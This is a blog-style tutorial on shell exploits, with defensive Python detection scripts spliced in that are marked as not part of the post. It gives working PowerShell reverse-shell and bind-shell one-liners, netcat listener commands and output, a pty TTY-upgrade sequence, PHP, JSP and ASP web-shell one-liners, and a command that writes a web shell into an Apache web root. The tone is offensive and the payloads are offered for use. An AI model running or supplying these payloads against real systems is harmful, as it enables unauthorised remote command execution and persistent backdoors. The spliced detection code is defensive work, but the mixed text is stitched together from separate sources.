Shell Exploit Types
There are various types of shell exploits and ways to use them. In this post we will look at the three main types:
- Reverse Shell: the target calls back to a listener on your system.
- Bind Shell: the typical “backdoor” entryway into a system. Once created it stays there until reboot.
- Web Shell: not really a shell; it runs a single pre-defined command passed through HTTP parameters.
Reverse Shell
This has to be the quickest way into a system. All we need to do is identify a vulnerability in the remote host that allows remote code execution (the script-kiddie route: nmap the ports, then look up the exploit in Metasploit if one exists).
It is even easier if one has physical access to the system, but in that case a bind shell works much better (more on that later).
To set it up, all you need to do is start a netcat listener on a port of your choice:
zangetsu$ nc -lvnp 1234
listening on [any] 1234 ...
The -l, -v, -n and -p flags mean listen, verbose (tells you when you have a connection), no DNS resolution, and the port number.
Now that we have cast the net, time to dump the chum.
For a list of reverse shell commands, PayloadsAllTheThings has you covered; it should help until you can start writing these yourself. Let's try the PowerShell one for Windows machines (careful if you copy this: Windows Defender will delete the file containing it, which was a huge pain while writing this post).
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<hostip>',<port>);$s = $client.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $data 2>&1 | Out-String );$sb2 = $sb + 'PS ' + (pwd).Path + '> ';$sbt = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()};$client.Close()"
Replace <hostip> and <port> with your own values.
zangetsu$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [hostip] from (UNKNOWN) [hostip] 41572
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Bind Shell
Similar theory, just with the script flipped. Rapunzel is already in the tower with the long hair; you need her to throw it down for you. Time to get your wooing skills ready.
Take a script from PayloadsAllTheThings. This time the target will be the listener and we will be the caller.
powershell -NoP -NonI -W Hidden -Exec Bypass -Command $listener = [System.Net.Sockets.TcpListener]1234; $listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + " ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();
Now that the backdoor is set up, we use netcat to call the designated port:
Romeo$ nc 10.10.10.1 1234
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
This is a persistent connection: you can disconnect and reconnect whenever you wish until the host is rebooted.
Now you may be wondering: this sounds a little too easy for comfort, so why would anyone spend their time running Nmap and then Metasploit against a system when the target could just run this? If you were following along, you will have noticed that the shell you get here has a minor flaw: you can only type and delete. You cannot move within the command to fix typos or edit long payloads.
We must now upgrade.
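On the defensive side, a bind shell is just a process listening on a port the host was never meant to expose, so the simplest check is an inventory diff of listening sockets against an allow-list. This is an added example, not code from the post; the sample text is constructed in the shape of `ss -lntp` output and the allow-list of expected (port, process) pairs is an assumption.

```python
import re

# Added example (not from the original post). Compares current TCP listeners
# against an allow-list so that a stray listener, like the port-1234 bind
# shell above, stands out. Allow-list and sample output are assumptions.
EXPECTED_LISTENERS = {
    (22, "sshd"),
    (80, "nginx"),
    (443, "nginx"),
}

# Extracts process name and pid from the 'users:(("name",pid=123,fd=4))' column.
PROC_RE = re.compile(r'users:\(\("([^"]+)",pid=(\d+)')

def parse_ss(output):
    """Return [(port, process_name, pid)] for each LISTEN row of ss -lntp output."""
    rows = []
    for line in output.splitlines()[1:]:          # first line is the header
        cols = line.split()
        if len(cols) < 6 or cols[0] != "LISTEN":
            continue
        local = cols[3]                            # e.g. 0.0.0.0:1234 or [::]:22
        port = int(local.rsplit(":", 1)[1])
        m = PROC_RE.search(line)
        name, pid = (m.group(1), int(m.group(2))) if m else ("?", -1)
        rows.append((port, name, pid))
    return rows

def unexpected_listeners(output, allow=EXPECTED_LISTENERS):
    """Return listeners whose (port, process) pair is not in the allow-list."""
    return [r for r in parse_ss(output) if (r[0], r[1]) not in allow]

# Constructed sample in the shape of `ss -lntp` output (not a real capture).
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0      128    0.0.0.0:22         0.0.0.0:*         users:(("sshd",pid=812,fd=3))
LISTEN 0      511    0.0.0.0:80         0.0.0.0:*         users:(("nginx",pid=1020,fd=6))
LISTEN 0      511    0.0.0.0:443        0.0.0.0:*         users:(("nginx",pid=1020,fd=7))
LISTEN 0      10     0.0.0.0:1234       0.0.0.0:*         users:(("pwsh",pid=4412,fd=5))
LISTEN 0      128    [::]:22            [::]:*            users:(("sshd",pid=812,fd=4))
"""

if __name__ == "__main__":
    for port, name, pid in unexpected_listeners(SAMPLE_SS):
        print(f"unexpected listener: port {port} process {name} (pid {pid})")
```

Running it prints the single port-1234 listener; a real deployment would feed it live `ss -lntp` output and a per-host allow-list.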
Upgrading to TTY
There are many ways to do this. The easiest, I think, is the python/stty method.
In the netcat shell run:
python -c 'import pty; pty.spawn("/bin/bash")'
then background it to return to your regular shell (Ctrl+Z) and run:
stty raw -echo
fg
You can use stty to set other things too, like the terminal size (rows and columns) or colour support. If you do this often it is recommended to have a complete set of commands pre-defined so you can paste once and you are at home (in someone else's home).
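Both the PowerShell TCPClient one-liner from the Reverse Shell section and the `python -c 'import pty; pty.spawn(...)'` upgrade above leave a recognisable command line in process-creation telemetry, so one triage script covers both. This is an added example, not code from the post; the `pid|image|cmdline` record format, the indicator weights and the threshold are assumptions.

```python
import re

# Added example (not from the original post): heuristic triage of process-creation
# records for the two patterns this post shows, the PowerShell TCPClient reverse
# shell one-liner and the python pty.spawn TTY upgrade. The "pid|image|cmdline"
# record format, the indicator weights and the threshold are assumptions.
INDICATORS = [
    (re.compile(r"System\.Net\.Sockets\.TCPClient", re.I), 3, "TCPClient"),
    (re.compile(r"\.GetStream\(\)", re.I), 1, "GetStream"),
    (re.compile(r"\biex\b|Invoke-Expression", re.I), 2, "iex"),
    (re.compile(r"-nop\b|-NoProfile\b", re.I), 1, "noprofile"),
    (re.compile(r"-w(indowstyle)?\s+hidden\b", re.I), 1, "hidden"),
    (re.compile(r"-exec(utionpolicy)?\s+bypass\b", re.I), 1, "bypass"),
    (re.compile(r"\bpty\.spawn\s*\(", re.I), 3, "pty.spawn"),
]
THRESHOLD = 3  # one strong indicator, or several weak ones, flags the process

def score_cmdline(cmdline):
    """Return (score, [indicator names]) for one command line."""
    score, hits = 0, []
    for pattern, weight, name in INDICATORS:
        if pattern.search(cmdline):
            score += weight
            hits.append(name)
    return score, hits

def triage(records):
    """Parse 'pid|image|cmdline' records; return [(pid, image, hits)] meeting THRESHOLD."""
    flagged = []
    for rec in records:
        pid, image, cmdline = rec.split("|", 2)
        score, hits = score_cmdline(cmdline)
        if score >= THRESHOLD:
            flagged.append((int(pid), image, hits))
    return flagged

# Constructed sample records (not real telemetry).
SAMPLE_RECORDS = [
    "4412|powershell.exe|powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('10.10.14.5',1234);"
    "$s = $client.GetStream();$sb = (iex $data 2>&1 | Out-String)\"",
    "4420|powershell.exe|powershell -NoProfile -File C:\\scripts\\backup.ps1",
    "1337|python|python -c 'import pty; pty.spawn(\"/bin/bash\")'",
    "2000|python3|python3 /opt/app/worker.py",
]

if __name__ == "__main__":
    for pid, image, hits in triage(SAMPLE_RECORDS):
        print(f"pid {pid} ({image}) flagged: {', '.join(hits)}")
```

The legitimate `-NoProfile -File backup.ps1` run scores only 1 and is not flagged, which is the point of weighting: a single generic flag should not page anyone.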
Web Shell
Wait, read this one too. It's cool, I swear, and not as complex as the previous two. It is easier to catch though, so weigh your scales accordingly :)
<?php system($_REQUEST["cmd"]); ?>
<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>
<% eval request("cmd") %>
Three common ones. Simple, huh. There's a reason PHP deserves to die.
Once you have a web shell, you drop it in the web root of the server. These are relatively easy to find and are most commonly kept here:
- Apache: /var/www/html
- Nginx: /usr/local/nginx/html
- XAMPP: C:/xampp/htdocs/
Geniuses, huh. It's no wonder they don't hire junior devs.
So based on banner retrieval we can change the command accordingly; for example, for an Apache server on Linux it would be:
echo '<?php system($_REQUEST["cmd"]); ?>' > /var/www/html/shell.php
To connect, just go to “link/shell.php?cmd=id”.
We can keep changing the command to get its output. A great benefit of a web shell is that it bypasses any firewall restrictions in place, since it does not open a new connection on a port but runs on the web port, 80 or 443, or whatever port the web application is using. Another great benefit is that if the compromised host is rebooted, the web shell is still in place, and we can access it and get command execution without exploiting the remote host again.
On the other hand, a web shell is not as interactive as reverse and bind shells, since we have to keep requesting a different URL to execute each command. Still, it is possible to write a Python script to automate this process and give us a semi-interactive web shell right within our terminal.
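Because a web shell lives as a file under the web root and is driven through a query parameter, it is also the easiest of the three to detect: scan the web roots listed above for the three one-liner signatures, and scan the access log for requests carrying a `cmd=` parameter. This is an added example, not code from the post; the file map and log lines are constructed inline.

```python
import re

# Added example (not from the original post). Two checks for the web shells
# shown above: (1) file contents under the post's web roots, (2) access-log
# requests that carry a cmd= query parameter. Samples are constructed.
WEB_ROOTS = ["/var/www/html", "/usr/local/nginx/html", "C:/xampp/htdocs/"]

SIGNATURES = {
    "php_system_request": re.compile(r"system\s*\(\s*\$_(REQUEST|GET|POST)\s*\[", re.I),
    "jsp_runtime_exec": re.compile(r"Runtime\.getRuntime\(\)\.exec\s*\(\s*request\.getParameter", re.I),
    "asp_eval_request": re.compile(r"\beval\s+request\s*\(", re.I),
}

def scan_files(files):
    """files: {path: content}. Return [(path, signature)] for matches under a web root."""
    hits = []
    for path, content in files.items():
        if not any(path.startswith(root) for root in WEB_ROOTS):
            continue                       # only files the web server can serve matter
        for name, pat in SIGNATURES.items():
            if pat.search(content):
                hits.append((path, name))
    return hits

# Matches a request target whose query string carries a 'cmd' parameter.
CMD_PARAM_RE = re.compile(r'"(?:GET|POST) (\S+\?(?:[^ ]*&)?cmd=[^ ]*) HTTP')

def scan_access_log(lines):
    """Return [(client_ip, request_target)] for requests carrying a cmd= parameter."""
    found = []
    for line in lines:
        m = CMD_PARAM_RE.search(line)
        if m:
            found.append((line.split()[0], m.group(1)))
    return found

# Constructed sample web-root contents and combined-format access log lines.
SAMPLE_FILES = {
    "/var/www/html/index.php": "<?php echo 'hello'; ?>",
    "/var/www/html/shell.php": '<?php system($_REQUEST["cmd"]); ?>',
    "/var/www/html/uploads/x.jsp": '<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>',
    "C:/xampp/htdocs/cmd.asp": '<% eval request("cmd") %>',
    "/home/dev/notes.php": '<?php system($_REQUEST["cmd"]); ?>',   # outside any web root
}
SAMPLE_LOG = [
    '10.10.14.5 - - [01/Jan/2024:10:00:00 +0000] "GET /shell.php?cmd=id HTTP/1.1" 200 52',
    '10.10.14.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 1024',
    '192.168.1.20 - - [01/Jan/2024:10:00:02 +0000] "GET /search.php?q=cmd HTTP/1.1" 200 300',
]
```

On real hosts, walk the web roots with `os.walk` and read each file into the same `{path: content}` shape; the signature set is deliberately small and should be extended with whatever the environment's own templates look like.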
Hope this helped :)